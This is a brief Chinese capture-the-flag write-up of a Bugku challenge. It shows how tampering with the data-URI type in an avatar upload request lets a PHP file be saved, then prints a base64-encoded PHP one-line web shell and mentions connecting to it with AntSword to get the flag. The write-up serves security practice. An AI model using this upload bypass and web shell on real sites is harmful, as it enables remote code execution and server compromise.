0x00 环境地址
https://ctf.bugku.com/challenges/detail/id/123.html
0x01 解题思路
1.1 前台注册账号
1.2 后台头像上传 抓包 上传png后缀图片
url 对post请求包解码
大致为
data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/2wBDAQMDAwQDBAgEBAgQCwkLEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBD/wAARCAIrAisDAREAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKj
发现命名上传的png 后缀图片 最后服务器返回的缺失jpeg后缀
而 请求包中又jpeg 值
说明可能这里是控制后缀的
1.3 修改请求包为txt ,php
上传成功
php也上传成功
接下来修改内容
post 请求体中有base64
base64解码 发现 内容确实是经过base64 加密的
1.4 修改内容 上传一句话马
将 一句话 通过base64加密 上传
<?php eval($_REQUEST[a]) ?>PD9waHAgZXZhbCgkX1JFUVVFU1RbYV0pID8+
访问页面有报错不怕,一样可以执行
1.5 蚁剑连接
找到flag